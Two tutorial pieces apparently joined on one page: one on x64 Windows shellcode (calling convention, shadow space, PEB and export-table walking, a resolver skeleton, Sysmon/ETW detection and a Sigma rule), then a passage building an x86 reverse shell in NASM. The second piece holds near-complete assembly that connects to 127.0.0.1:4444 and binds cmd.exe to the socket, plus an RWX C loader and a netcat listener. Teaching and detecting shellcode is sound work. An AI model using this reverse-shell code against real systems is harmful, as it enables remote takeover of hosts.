Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions

Objective: Understand the architectural and ABI-level differences between x86 and x64 Windows shellcode, including the Microsoft x64 calling convention, shadow space, stack alignment, position-independent API resolution via PEB walking, and the detection surface each technique exposes.

1. From x86 to x64: What Actually Changed

Moving shellcode from x86 to x64 Windows is not a syntactic exercise of renaming EAX to RAX. The ABI changed, the segment register that anchors the TEB changed, and the addressing model changed. A snippet that “looks right” can execute cleanly, corrupt the host process, and crash three calls later inside an SSE instruction — none of which gives the author an obvious clue.

Item	x86	x64
General-purpose registers	8 × 32-bit (`EAX`…`EDI`)	16 × 64-bit (`RAX`…`R15`)
Windows calling convention	`stdcall` / `cdecl` — all args on stack	Unified fast-call — first 4 integer args in registers
TEB segment register	`FS`; PEB at `fs:[0x30]`	`GS`; PEB at `gs:[0x60]`
Address width	32-bit	64-bit (48-bit canonical VA in practice)
`call` pushes	4-byte return address	8-byte return address
RIP-relative addressing	Not available	Available; `lea rax, [rip + offset]` is idiomatic in PIC

Two consequences dominate the rest of this tutorial. First, x64 adopts a single __fastcall-style ABI with a mandatory shadow space and 16-byte stack alignment rule. Second, the TEB is reached via GS, not FS, and every PEB offset must be updated for the 64-bit struct layout.

2. The Microsoft x64 ABI Deep-Dive

The Microsoft x64 calling convention passes the first four integer arguments in registers and floating-point arguments in the low halves of the first four XMM registers. Anything beyond that goes on the stack, above the shadow space, pushed right-to-left.

Argument #	Integer Register	Floating-Point Register
1st	`RCX`	`XMM0L`
2nd	`RDX`	`XMM1L`
3rd	`R8`	`XMM2L`
4th	`R9`	`XMM3L`
5th+	Stack (above shadow space)	Stack

The return value lives in RAX for integers and pointers, and in XMM0 for floating-point results.

Volatile vs Non-Volatile Registers

Class	Registers
Volatile	`RAX`, `RCX`, `RDX`, `R8`, `R9`, `R10`, `R11`, `XMM0`–`XMM5`
Non-volatile	`RBX`, `RBP`, `RDI`, `RSI`, `RSP`, `R12`, `R13`, `R14`, `R15`, `XMM6`–`XMM15`

A callee may freely destroy volatile registers; non-volatile registers must be preserved across calls. Shellcode that clobbers RBX or RDI in the host thread and then returns control corrupts the host. This is the single most common reason “working” shellcode crashes the host process several instructions after the shellcode finishes.

Side-by-Side: x86 Push vs x64 Register Load

; --- x86 stdcall: MessageBoxA(0, "msg", "title", 0) ---
push 0              ; uType
push title          ; lpCaption
push msg            ; lpText
push 0              ; hWnd
call [MessageBoxA]  ; callee cleans the stack

; --- x64 fastcall: same call ---
xor  rcx, rcx                       ; hWnd      = NULL
lea  rdx, [rel msg]                 ; lpText
lea  r8,  [rel title]               ; lpCaption
xor  r9d, r9d                       ; uType     = 0
sub  rsp, 0x28                      ; shadow space + alignment (see §4)
call [rel MessageBoxA]
add  rsp, 0x28

Note xor r9d, r9d rather than xor r9, r9 — writing to the 32-bit sub-register zero-extends to the full 64-bit register and produces a shorter, null-byte-free opcode.

Diagram showing the Microsoft x64 calling convention: arguments flow through RCX, RDX, R8, R9, then onto the stack, with the return value in RAX. — The Microsoft x64 ABI passes the first four integer arguments in registers; additional arguments land on the stack above shadow space.

3. Shadow Space: Why, What, and Where

In the Microsoft x64 convention the caller must reserve 32 bytes (4 × 8) of stack immediately above the return address as shadow space (also called home space or spill space). This area exists so the callee has somewhere to spill RCX, RDX, R8, and R9 back to memory if it needs to take their addresses or free up the registers for re-use.

Critical points:

Shadow space is always reserved, even when the callee takes fewer than four arguments and even when the callee never spills.
It is owned by the caller. The callee may overwrite it without saving the previous contents.
The caller does not zero or initialise it. The callee is responsible for whatever it writes there.
Stack arguments beyond the fourth begin at [RSP + 0x28] (32 bytes shadow + 8 bytes return address).

Layout immediately after `call`, before callee prologue	Offset from `RSP`
Return address (pushed by `call`)	`[RSP + 0x00]`
Shadow slot for `RCX`	`[RSP + 0x08]`
Shadow slot for `RDX`	`[RSP + 0x10]`
Shadow slot for `R8`	`[RSP + 0x18]`
Shadow slot for `R9`	`[RSP + 0x20]`
5th argument (if any)	`[RSP + 0x28]`

Skip the shadow allocation and the first thing the callee does — often a mov [rsp+8], rcx early in a Win32 prologue — clobbers your own stack frame or, worse, the saved return address you just pushed.

Stack layout diagram showing the mandatory 32-byte shadow space between the return address and stack arguments in the Microsoft x64 calling convention. — The caller must always reserve 32 bytes of shadow space directly above the return address, with additional stack arguments starting at RSP+0x28.

4. Stack Alignment in Practice

The Microsoft x64 ABI requires RSP to be 16-byte aligned at the moment of a call, except inside a prolog. The hardware call then pushes an 8-byte return address, so on entry to the callee RSP is 16N + 8 aligned. Win32 internals (memcpy, CRT, anything that uses SSE/AVX with aligned moves) will issue movaps / movdqa against stack locations and will raise EXCEPTION_ACCESS_VIOLATION (0xC0000005) if RSP is wrong by 8.

This is why the canonical shellcode prologue is sub rsp, 0x28, not 0x20:

0x20 (32 bytes) for shadow space.
+ 0x08 to undo the misalignment the preceding call introduced.

; Canonical shellcode call wrapper
sub rsp, 0x28          ; 32B shadow + 8B realign
call rax               ; rax = resolved API address
add rsp, 0x28

When the shellcode entry itself was reached by a jump from unknown context, force alignment explicitly:

; Defensive entry: align RSP regardless of caller state
and rsp, 0xFFFFFFFFFFFFFFF0   ; force 16-byte alignment
sub rsp, 0x28                  ; shadow + 8 to keep call-time alignment

To diagnose alignment faults in WinDbg, dump the faulting instruction (u .) and check whether it is a movaps / movdqa referencing [rsp+…]. If rsp & 0xF == 0x8 at the call, you forgot the + 0x08.

5. Position-Independent Code Fundamentals

Shellcode does not know where it will land. Hard-coded addresses are forbidden — ASLR randomises module bases per boot, and the shellcode itself is dropped at an allocator-chosen address. Two x64 idioms enable position independence:

RIP-relative addressing. lea rax, [rel label] resolves to lea rax, [rip + disp32] and produces correct results regardless of load address. This is the preferred way to reference embedded data in x64 shellcode.
call/pop delta trick. A call to the next instruction pushes its return address — the runtime location of the following label. The callee pops it into a register to obtain a base for subsequent offsets.

; Obtain the runtime address of `data` without RIP-relative encoding
    call get_rip
get_rip:
    pop rbx                  ; rbx = address of next instruction
    lea rsi, [rbx + data - get_rip]
    jmp continue
data:
    db "kernel32.dll", 0
continue:

In practice, prefer lea reg, [rel label] for clarity; reach for call/pop only when an encoder demands it (for example, to avoid certain bad bytes).

6. PEB Walking: Finding kernel32.dll Without Imports

Because shellcode has no import table, it must walk the loader’s in-memory bookkeeping to find kernel32.dll and then resolve GetProcAddress / LoadLibraryA from its exports. On x64 Windows the chain starts at GS and uses these offsets:

Step	Source	Field	Offset (x64)
1	`GS` segment	→ `TEB`	—
2	`TEB`	`ProcessEnvironmentBlock`	`+0x060`
3	`PEB`	`Ldr` → `PEB_LDR_DATA`	`+0x018`
4	`PEB_LDR_DATA`	`InMemoryOrderModuleList`	`+0x020`
5	`LDR_DATA_TABLE_ENTRY` link	`InMemoryOrderLinks.Flink`	`+0x000`
6	`LDR_DATA_TABLE_ENTRY`	`DllBase` (from `InMemoryOrderLinks`)	`+0x030`

The InMemoryOrderModuleList on a normal process begins with the executable, then ntdll.dll, then kernel32.dll. Walking two Flinks from the head reaches the kernel32.dll entry. Production-grade shellcode hashes the BaseDllName string rather than trusting that order, both for resilience and because EDRs deliberately permute the head of the list as a tripwire (see §10).

; --- PEB walk skeleton: locate kernel32.dll base in rax ---
    xor   eax, eax
    mov   rbx, [gs:0x60]        ; TEB -> PEB
    mov   rbx, [rbx + 0x18]     ; PEB -> Ldr (PEB_LDR_DATA)
    mov   rbx, [rbx + 0x20]     ; -> InMemoryOrderModuleList.Flink
                                ;    (points into 1st LDR_DATA_TABLE_ENTRY's InMemoryOrderLinks)
    mov   rbx, [rbx]            ; advance: -> 2nd entry (ntdll)
    mov   rbx, [rbx]            ; advance: -> 3rd entry (kernel32)
    mov   rax, [rbx + 0x30]     ; DllBase relative to InMemoryOrderLinks (x64)
                                ; rax now holds kernel32.dll base address

To verify the offsets against the target OS build, drop into WinDbg on a live process and dump the structures directly:

0:000> dt nt!_TEB ProcessEnvironmentBlock
0:000> dt nt!_PEB Ldr
0:000> dt nt!_PEB_LDR_DATA InMemoryOrderModuleList
0:000> dt nt!_LDR_DATA_TABLE_ENTRY DllBase BaseDllName
0:000> !lmi kernel32

Flow diagram tracing the PEB walk from GS register through PEB_LDR_DATA and InMemoryOrderModuleList to locate kernel32.dll base address. — Shellcode reaches kernel32.dll by following two Flink pointers from the InMemoryOrderModuleList head anchored at GS:[0x60].

7. Parsing the Export Address Table

With kernel32.dll‘s base in hand, the shellcode walks the PE headers to the Export Directory and then iterates AddressOfNames, comparing each name against a precomputed hash. String literals like "GetProcAddress" are avoided to defeat trivial signatures and to remove embedded nulls.

Key offsets from a loaded module base:

Field	Offset
`e_lfanew` (RVA of PE header)	`DllBase + 0x3C`
Optional Header	`PE_header + 0x18`
Export Directory RVA (PE32+)	`OptHeader + 0x70`
`AddressOfFunctions`	`ExportDir + 0x1C`
`AddressOfNames`	`ExportDir + 0x20`
`AddressOfNameOrdinals`	`ExportDir + 0x24`

; --- EAT walk outline: resolve an export by ROR-13 name hash ---
; in : rax = module base, ebp = target hash (e.g. for "GetProcAddress")
; out: rax = exported function address (or 0)

    mov   ecx, [rax + 0x3C]      ; e_lfanew
    add   rcx, rax               ; rcx = PE header
    mov   edx, [rcx + 0x88]      ; Export Directory RVA (OptHdr + 0x70)
    add   rdx, rax               ; rdx = IMAGE_EXPORT_DIRECTORY
    mov   r8d,  [rdx + 0x18]     ; NumberOfNames
    mov   r9d,  [rdx + 0x20]     ; AddressOfNames RVA
    add   r9, rax
    xor   r10, r10               ; index

.next_name:
    mov   esi, [r9 + r10*4]      ; name RVA
    add   rsi, rax               ; rsi -> ASCII export name
    xor   edi, edi               ; hash accumulator

.hash_byte:
    movzx eax, byte [rsi]
    test  al, al
    jz    .check
    ror   edi, 13
    add   edi, eax
    inc   rsi
    jmp   .hash_byte

.check:
    cmp   edi, ebp               ; compare ROR-13 hash
    je    .found
    inc   r10
    cmp   r10d, r8d
    jb    .next_name
    xor   rax, rax               ; not found
    ret
.found:
    ; resolve via AddressOfNameOrdinals + AddressOfFunctions
    ; (omitted for brevity)
    ret

The ROR-13 rotate-and-add hash, popularised by the Metasploit block_api stub, is the de facto standard precisely because defenders now key on it (see §10).

8. Null-Byte and Bad-Character Avoidance

Shellcode delivered through a string-copy primitive (strcpy, lstrcatA, format-string echo) is truncated at the first null byte. x64 immediates routinely embed nulls because most useful constants and addresses do not occupy all 64 bits.

Problem	Fix
`mov rax, 0x000000007FFE1234` → nulls	`xor eax, eax` then `mov eax, 0x7FFE1234` (zero-extends)
64-bit literal in `mov r9, imm64`	`lea r9, [rel label]` or build via shifts/ORs
`push 0` → encodes `6A 00`	`xor rcx, rcx` ; `push rcx`
`mov rcx, 0` → 7-byte null run	`xor ecx, ecx`

; --- Null-byte comparison ---
; BAD: mov rax, 0x76ab1234
;   48 B8 34 12 AB 76 00 00 00 00   <-- four null bytes
mov rax, 0x76ab1234

; GOOD: zero-extend via 32-bit sub-register
;   31 C0                            <-- xor eax, eax
;   B8 34 12 AB 76                   <-- mov eax, 0x76AB1234
xor eax, eax
mov eax, 0x76ab1234

Writing to EAX implicitly zeroes the upper 32 bits of RAX — this single architectural quirk eliminates most accidental nulls in shellcode constants.

A short Python lab to validate a candidate snippet:

from keystone import Ks, KS_ARCH_X86, KS_MODE_64

asm = b"""
    xor eax, eax
    mov eax, 0x76ab1234
    mov rbx, qword ptr gs:[0x60]
    mov rbx, qword ptr [rbx + 0x18]
"""
ks = Ks(KS_ARCH_X86, KS_MODE_64)
code, _ = ks.asm(asm)
buf = bytes(code)
print(buf.hex())
bad = [i for i, b in enumerate(buf) if b == 0x00]
print(f"length={len(buf)} bad_byte_offsets={bad}")

Run it, see exactly where nulls (or any other bad character) land, and rewrite the offending instruction.

9. Shellcode Skeleton: Putting It Together

The pieces combine into a recognisable x64 stub: align the stack, walk the PEB to find kernel32.dll, parse the EAT to resolve GetProcAddress and LoadLibraryA, and then call out through the standard ABI with proper shadow space.

[BITS 64]
_start:
    ; --- entry: defensively align stack ---
    and   rsp, 0xFFFFFFFFFFFFFFF0
    sub   rsp, 0x28                ; shadow space + alignment

    ; --- locate kernel32.dll via PEB ---
    mov   rbx, [gs:0x60]           ; TEB -> PEB
    mov   rbx, [rbx + 0x18]        ; PEB -> Ldr
    mov   rbx, [rbx + 0x20]        ; InMemoryOrderModuleList.Flink
    mov   rbx, [rbx]               ; -> ntdll entry
    mov   rbx, [rbx]               ; -> kernel32 entry
    mov   r15, [rbx + 0x30]        ; r15 = kernel32 base

    ; --- resolve GetProcAddress via ROR-13 hash (call into eat_lookup) ---
    mov   rcx, r15
    mov   edx, 0x7C0DFCAA          ; ROR-13("GetProcAddress")  (illustrative)
    call  eat_lookup               ; rax = &GetProcAddress
    mov   r14, rax

    ; --- call LoadLibraryA("user32.dll") via GetProcAddress ---
    mov   rcx, r15                 ; hModule = kernel32
    lea   rdx, [rel s_LoadLibraryA]
    call  r14                      ; rax = &LoadLibraryA
    lea   rcx, [rel s_user32]
    call  rax                      ; rax = HMODULE user32

    ; --- ... continue resolution and API calls ...

    add   rsp, 0x28
    ret

s_LoadLibraryA: db "LoadLibraryA", 0
s_user32:       db "user32.dll", 0

; eat_lookup: in rcx=module base, edx=ROR13 hash -> rax = export addr
eat_lookup:
    ; (see §7 for the inner loop)
    ret

Every block in the skeleton corresponds to one of the rules established above: sub rsp, 0x28 for shadow + alignment, gs:[0x60] for the PEB, [rbx + 0x30] for DllBase, lea + RIP-relative strings for PIC, and r14 / r15 carrying non-volatile state across calls without manual save/restore.

10. Common Attacker Techniques

Technique	Description
PEB-walk API resolution	Locate `kernel32.dll` via `gs:[0x60]` chain, parse exports by hash
ROR-13 export hashing	Avoid embedded API name strings; survive static signature scans
RIP-relative PIC	`lea reg, [rel label]` to address embedded data without fixups
Sub-register zero-extension	`mov eax, imm32` to write `RAX` with no null bytes
Shadow-space-aware call wrapping	`sub rsp, 0x28` around every Win32 call from an unknown caller
Direct Win32 → Native API substitution	Call `Nt*` syscalls to bypass usermode hooks (`T1106`)
Reflective loading of a PE in memory	Shellcode bootstraps a full PE image without touching disk (`T1620`)

11. Defensive Strategies & Detection

Shellcode is observable at multiple layers. The most reliable signals come from the behaviours the techniques above require, not from the byte patterns they happen to produce.

Sysmon events to enable and triage:

EventID 1 — Process Create. Unusual parent/child chains (browser, Office, mail client spawning cmd.exe / powershell.exe) are the cheapest, highest-yield signal.
EventID 8 — CreateRemoteThread. Cross-process thread creation into LSASS, browsers, or signed Windows binaries is high-fidelity.
EventID 10 — ProcessAccess. Watch GrantedAccess masks like 0x1FFFFF (full access) and 0x1010 (read + VM-write).
EventID 17 / 18 — Pipe creation/connection, frequently used by shellcode-launched implants for C2.

ETW providers worth subscribing to in EDR pipelines:

Microsoft-Windows-Kernel-Process — kernel-side process/thread/image events.
Microsoft-Windows-Threat-Intelligence (PPL-only) — NtAllocateVirtualMemory, NtProtectVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx at the syscall layer, bypassed by no usermode hook.
Microsoft-Windows-Security-Auditing — handle and object access.

Audit policies: Audit Process Creation (Success) and Audit Kernel Object surface the same events to the classic Security log for SIEM ingestion.

Behavioural signals defenders should hunt on:

Threads with StartAddress in MEM_PRIVATE regions that are PAGE_EXECUTE_* and not backed by a file image.
CallTrace containing UNKNOWN frames — the calling instruction lives in unbacked memory.
gs:[0x60] opcode pattern (65 48 8B 04 25 60 00 00 00) inside executable regions of non-system modules.
ROR-13 hashing loops in memory scans.

Sigma sketch — suspicious cross-process access typical of shellcode injection:

title: Suspicious Cross-Process Access With VM-Write Rights
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess:
      - '0x1FFFFF'
      - '0x1410'
      - '0x1010'
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\WmiPrvSE.exe'
  condition: selection and not filter_legit
level: high

Hardening to deploy on monitored endpoints:

Arbitrary Code Guard (ACG) — denies the PAGE_EXECUTE_* transition that turns a MEM_PRIVATE shellcode buffer into runnable code.
Control Flow Guard (CFG) — invalidates indirect calls into unregistered targets, which shellcode entry points always are.
Block Win32 API calls from Office macros / child processes — Attack Surface Reduction rule that severs the most common shellcode delivery vector.
PPL-protected EDR with kernel ETW Ti subscription — preserves syscall-layer telemetry even when userland hooks are patched out.

A useful EDR tripwire is to permute the head of InMemoryOrderModuleList with stub entries: shellcode that walks two Flinks blindly resolves the decoy module, fails to find expected exports, and crashes — producing a high-fidelity detection.

12. Tools for x64 Shellcode Analysis

Tool	Description	Link
NASM	Assembler for the snippets in this tutorial; emits raw binary for direct hex inspection	`nasm.us`
Keystone Engine	Programmatic assembler (Python bindings) for bad-character analysis labs	`keystone-engine.org`
x64dbg	User-mode debugger; trace shellcode through `gs:[0x60]` and EAT walks	`x64dbg.com`
WinDbg	Inspect `_TEB`, `_PEB`, `_PEB_LDR_DATA`, `_LDR_DATA_TABLE_ENTRY` on the target build	`learn.microsoft.com`
Ghidra / IDA	Static analysis of shellcode-bearing samples and reflective loader stubs	`ghidra-sre.org`
Volatility 3	Memory forensics: enumerate suspicious `MEM_PRIVATE` + `RX` regions, hunt unbacked threads	`volatilityfoundation.org`
Process Hacker	Live triage of thread start addresses and memory protections	`processhacker.sourceforge.io`
Godbolt Compiler Explorer	Inspect MSVC-emitted x64 prologues to confirm ABI assumptions	`godbolt.org`

13. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Process Injection (umbrella)	`T1055`	Sysmon `EventID 8` + `EventID 10` with VM-write `GrantedAccess`
DLL Injection	`T1055.001`	Image Load (`EventID 7`) from `MEM_PRIVATE`-allocated path
Portable Executable Injection	`T1055.002`	Volatility scans for PE headers in `MEM_PRIVATE` `RX` regions
APC Injection	`T1055.004`	ETW Ti `NtQueueApcThread` to remote thread; alerted thread-start addresses
Process Hollowing	`T1055.012`	`EventID 1` with suspended child, followed by `EventID 10` write + resume
Native API	`T1106`	ETW Ti syscall provider; direct `Nt*` calls outside `ntdll`
Obfuscated Files or Information	`T1027`	YARA on ROR-13 loops; entropy heuristics on dropped payloads
Reflective Code Loading	`T1620`	Unbacked `RX` memory with PE magic / no module image record

Summary

x64 Windows shellcode is governed by a strict ABI: argument registers RCX/RDX/R8/R9, return in RAX, a 32-byte shadow space, and 16-byte stack alignment at every call.
The TEB is reached via gs:[0x60] on x64; every PEB offset (+0x18, +0x20, +0x30) differs from the x86 layout and must be verified against the target build.
Position-independent API resolution combines a PEB walk to kernel32.dll with an EAT walk using ROR-13 name hashing to avoid embedded strings.
Null-byte avoidance leans on 32-bit sub-register writes that zero-extend, RIP-relative lea, and XOR-then-push idioms.
Detection is layered: Sysmon EventID 8/10 for injection chains, ETW Threat-Intelligence for syscall-level memory writes, behavioural hunts for unbacked RX regions, and ACG/CFG/ASR hardening to deny the primitives shellcode depends on.

References

Writing Your First Shellcode: x86 Reverse Shell from Scratch

Objective: Understand how a Windows x86 reverse shell payload is hand-built in NASM assembly — walking the PEB to locate kernel32.dll, parsing the PE export table to resolve GetProcAddress without imports, initialising Winsock, and spawning cmd.exe over a socket — and learn the telemetry each stage emits so you can detect and defend against it.

1. What Is Shellcode? Constraints and Goals

Shellcode is a self-contained blob of machine code that runs after a control-flow hijack (or injection) with no loader, no imports, and no fixed base address. It is the raw payload that tools like msfvenom emit; understanding it byte-by-byte is what lets a defender recognise it in memory.

A Windows x86 reverse shell differs from a Linux equivalent in one fundamental way: Linux exposes a stable syscall/int 0x80 interface, while Windows forces you to call documented Win32 APIs — and you cannot import them, because injected code has no import table. You must therefore find the APIs yourself at runtime.

Constraint	Description
Position independent	Runs at an unknown address; all references are stack-relative or computed
Null-free	`\x00` terminates strings in many injection vectors and truncates the payload
No imports	API addresses must be resolved from loaded modules at runtime
Bad-char aware	`\x00`, `\x0a`, `\x0d` and vector-specific bytes must be avoided by design

Lab setup: a Windows 10 x86 VM, NASM for assembly, WinDbg for stepping the PEB walk, a small C runner to execute the blob, and a Python scanner to audit bad characters. Build and test only in an isolated VM.

2. x86 Calling Conventions and Stack Mechanics

Win32 APIs use stdcall: arguments are pushed right-to-left, and the callee cleans the stack with ret N. This matters because after a successful API call you do not adjust esp yourself — the function already did. cdecl (caller cleans) appears only in CRT helpers you will not touch here.

Convention	Stack Cleanup	Argument Order	Used By
`stdcall`	Callee (`ret N`)	Right-to-left	Win32 APIs (`CreateProcessA`, `WSASocketA`)
`cdecl`	Caller	Right-to-left	CRT functions

eax, ecx, and edx are volatile (caller-saved); ebx, esi, edi, and ebp survive a call. Shellcode exploits this: stash the kernel32 base in ebx and a resolver pointer in ebp, and they persist across every API call. Strings and structures are constructed by pushing dwords onto the stack in reverse, then referencing them directly through esp.

3. The PEB Walk: Finding kernel32.dll Without Imports

Every thread can reach its Process Environment Block (PEB) through the TEB at FS:[0x30]. The PEB holds Ldr (a PEB_LDR_DATA) at +0x0C, whose InMemoryOrderModuleList at +0x14 is a doubly-linked list of loaded modules. On Windows 7–11 x86 the load order is fixed: [0] the executable → [1] ntdll.dll → [2] kernel32.dll. Two FLink dereferences land on kernel32‘s entry, and DllBase sits 0x10 bytes past the InMemoryOrderLinks field.

bits 32
    xor    eax, eax
    mov    eax, [fs:0x30]      ; TEB->ProcessEnvironmentBlock (PEB)
    mov    eax, [eax+0x0c]     ; PEB->Ldr (PEB_LDR_DATA)
    mov    eax, [eax+0x14]     ; Ldr->InMemoryOrderModuleList (1st: executable)
    mov    eax, [eax]          ; FLink -> ntdll.dll entry
    mov    eax, [eax]          ; FLink -> kernel32.dll entry
    mov    ebx, [eax+0x10]     ; LDR entry->DllBase (kernel32 base) -> ebx

Verify the chain live in WinDbg before trusting any offset on your target build:

0:000> dt nt!_TEB @$teb ProcessEnvironmentBlock
0:000> dt nt!_PEB @$peb Ldr
0:000> dt nt!_PEB_LDR_DATA poi(@$peb+0xc) InMemoryOrderModuleList
0:000> dl poi(poi(@$peb+0xc)+0x14) 4

Flowchart showing the PEB walk chain from TEB at FS:[0x30] through PEB, PEB_LDR_DATA, and InMemoryOrderModuleList to reach kernel32.dll base address — Two FLink dereferences from the module list head land on kernel32.dll’s LDR entry; DllBase sits 0x10 bytes past the InMemoryOrderLinks field.

4. Export Table Parsing: Resolving GetProcAddress

The bootstrap problem: shellcode cannot call GetProcAddress until it has found GetProcAddress. The fix is to parse the kernel32 PE export table manually. From the base, e_lfanew at +0x3C reaches the NT headers; the export-directory RVA lives at NT +0x78; the directory exposes three parallel arrays — AddressOfNames (+0x20), AddressOfNameOrdinals (+0x24), and AddressOfFunctions (+0x1C).

; ebx = kernel32 base
    mov    eax, [ebx+0x3c]     ; e_lfanew
    mov    eax, [ebx+eax+0x78] ; export table RVA
    lea    edi, [ebx+eax]      ; edi -> IMAGE_EXPORT_DIRECTORY
    mov    ecx, [edi+0x20]     ; AddressOfNames RVA
    lea    ecx, [ebx+ecx]      ; -> name-pointer array
    xor    edx, edx            ; name index = 0
.next:
    mov    esi, [ecx+edx*4]    ; RVA of candidate name
    lea    esi, [ebx+esi]      ; -> ASCII name string
    ; compare esi against "GetProcAddress" (string or 4-byte hash) ...
    inc    edx
    jmp    .next
.match:
    mov    eax, [edi+0x24]     ; AddressOfNameOrdinals RVA
    movzx  eax, word [ebx+eax+edx*2]   ; ordinal index for this name
    mov    ecx, [edi+0x1c]     ; AddressOfFunctions RVA
    mov    eax, [ebx+ecx+eax*4]; function RVA
    lea    eax, [ebx+eax]      ; eax = VA of GetProcAddress

Production shellcode usually replaces the literal strcmp with a rolling 4-byte hash of each export name — it is smaller and naturally null-free.

Diagram of PE export table structure showing how shellcode traverses from kernel32 base address through NT headers to the export directory and its three parallel arrays to resolve GetProcAddress — Shellcode walks three parallel export arrays — names, ordinals, and functions — to translate a name hash into the final virtual address of GetProcAddress.

5. Bootstrapping Further API Resolution

Once GetProcAddress is resolved, save it (e.g. in ebp) and use it to resolve everything else. The first follow-up is LoadLibraryA, which lets you bring in ws2_32.dll and resolve the Winsock functions the reverse shell needs.

; ebp = resolved GetProcAddress, ebx = kernel32 base
    push   0x41797261          ; "aryA"
    push   0x7262694c          ; "Libr"
    push   0x64616f4c          ; "Load"
    mov    esi, esp            ; esi -> "LoadLibraryA"
    push   esi
    push   ebx                 ; hModule = kernel32
    call   ebp                 ; GetProcAddress -> LoadLibraryA in eax
    ; eax now holds LoadLibraryA; call it on "ws2_32.dll", then resolve
    ; WSAStartup, WSASocketA, WSAConnect, CreateProcessA, ExitProcess.

Every API name is pushed as reversed dwords so it reads correctly in memory. Wrap the resolve-and-call logic in a small subroutine that takes a module base and a name pointer; the reverse shell calls it seven times.

6. Winsock Initialisation and Socket Creation

WSAStartup(0x0202, &wsaData) must run before any socket API. Reserve the 400-byte WSADATA on the stack and pass a pointer; the OS fills it. Then WSASocketA(2, 1, 6, NULL, 0, 0) creates a TCP socket (AF_INET, SOCK_STREAM, IPPROTO_TCP).

    sub    esp, 0x190          ; reserve WSADATA (400 bytes)
    push   esp                 ; lpWSAData
    push   0x0202              ; wVersionRequired = 2.2
    call   <WSAStartup>

    xor    eax, eax
    push   eax                 ; dwFlags
    push   eax                 ; g
    push   eax                 ; lpProtocolInfo = NULL
    push   6                   ; IPPROTO_TCP
    push   1                   ; SOCK_STREAM
    push   2                   ; AF_INET
    call   <WSASocketA>        ; eax = socket handle
    mov    edi, eax            ; save socket in edi

Build the 16-byte SOCKADDR_IN inline and connect. The IP and port are stored network byte order (big-endian); 127.0.0.1:4444 becomes 0x0100007f and the packed family/port dword 0x5c110002.

    xor    eax, eax
    push   eax                 ; sin_zero[4..8]
    push   eax                 ; sin_zero[0..4]
    push   0x0100007f          ; sin_addr  = 127.0.0.1
    push   0x5c110002          ; sin_port 4444 | sin_family AF_INET
    mov    esi, esp            ; esi -> SOCKADDR_IN

    push   eax                 ; lpCallee/QoS chain (NULLs)
    push   eax
    push   eax
    push   eax
    push   0x10                ; namelen
    push   esi                 ; name -> SOCKADDR_IN
    push   edi                 ; socket
    call   <WSAConnect>

7. Spawning cmd.exe Over the Socket

The final stage is the most error-prone: a fully populated 68-byte STARTUPINFOA with cb = 0x44, dwFlags = STARTF_USESTDHANDLES (0x100), and all three standard handles pointed at the connected socket. CreateProcessA(NULL, " cmd.exe", ...) then launches the shell with stdin/stdout/stderr riding the TCP stream.

    xor    eax, eax
    push   edi                 ; hStdError  = socket
    push   edi                 ; hStdOutput = socket
    push   edi                 ; hStdInput  = socket
    times 9 push eax           ; zero lpReserved2..dwY (9 dwords)
    push   0x00000100          ; dwFlags = STARTF_USESTDHANDLES
    times 4 push eax           ; lpTitle, lpDesktop, lpReserved, wShowWindow pad
    push   0x44                ; cb = sizeof(STARTUPINFOA)
    mov    ebx, esp            ; ebx -> STARTUPINFOA

    sub    esp, 0x10
    mov    esi, esp            ; esi -> PROCESS_INFORMATION

    push   eax                 ; "....\0" terminator (runtime-supplied null)
    push   0x6578652e          ; ".exe"
    push   0x646d6320          ; " cmd"  (0x20 = space, null-free)
    mov    edx, esp            ; edx -> " cmd.exe"

    push   esi                 ; lpProcessInformation
    push   ebx                 ; lpStartupInfo
    push   eax                 ; lpCurrentDirectory
    push   eax                 ; lpEnvironment
    push   eax                 ; dwCreationFlags
    inc    eax
    push   eax                 ; bInheritHandles = TRUE
    dec    eax
    push   eax                 ; lpThreadAttributes
    push   eax                 ; lpProcessAttributes
    push   edx                 ; lpCommandLine = " cmd.exe"
    push   eax                 ; lpApplicationName = NULL
    call   <CreateProcessA>

    push   eax                 ; uExitCode
    call   <ExitProcess>

Sequential flowchart of the full reverse shell execution chain from PEB walk through export parsing, Winsock initialisation, TCP connect, STARTUPINFOA setup, and final CreateProcessA call spawning cmd.exe — Every stage builds on the last: the PEB walk feeds export parsing, which unlocks Winsock, which provides the socket handle wired into cmd.exe’s standard I/O.

8. Null-Byte Elimination and Bad-Character Audit

A single \x00 mid-payload can truncate your shellcode. Design it out from the start.

Bad Byte	Naive Source	Null-Free Replacement
`\x00`	`mov ecx, 0`	`xor ecx, ecx`
`\x00` in string	`push 0x00657865` (“exe\0”)	terminator from `push eax` after `xor eax,eax`
`\x00` in `mov al,0`	`mov al, 0`	`xor eax, eax` then use `al`
`\x0a` / `\x0d`	constant containing CR/LF	re-encode IP/port or split the immediate

The runtime-supplied terminator trick (xor eax, eax → push eax) keeps the " cmd.exe" string null-free, and the leading space the space-padded " cmd" introduces is tolerated by CreateProcessA‘s command-line parser. Audit the assembled binary with a scanner:

import sys
BAD = {0x00, 0x0a, 0x0d}                # extend per injection vector

with open(sys.argv[1], "rb") as f:
    sc = f.read()
for i, b in enumerate(sc):
    if b in BAD:
        print(f"[!] bad char 0x{b:02x} at offset {i}")
print(f"[*] {len(sc)} bytes scanned")

9. Testing and Verification

Assemble to a flat binary, then execute it in a controlled runner that mirrors how an exploit lands code in memory — VirtualAlloc with PAGE_EXECUTE_READWRITE, copy, and call through a function pointer.

nasm -f bin reverse.asm -o reverse.bin
python3 badchars.py reverse.bin

#include <windows.h>
#include <string.h>
unsigned char sc[] = { /* contents of reverse.bin */ };

int main(void) {
    void *mem = VirtualAlloc(NULL, sizeof(sc),
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);   // RWX: loud, lab-only
    memcpy(mem, sc, sizeof(sc));
    ((void(*)())mem)();
    return 0;
}

Catch the callback with nc -lvnp 4444. Note the RWX allocation — real-world loaders allocate RW, copy, then flip to RX with VirtualProtect precisely because PAGE_EXECUTE_READWRITE is a classic detection signal.

10. Common Attacker Techniques

Technique	Description
PEB walk	Locate `kernel32.dll` base with no imports via `FS:[0x30]`
Export hashing	Resolve APIs by name hash to stay small and null-free
Stack string building	Push reversed dwords to stage `" cmd.exe"`, `ws2_32.dll`, API names
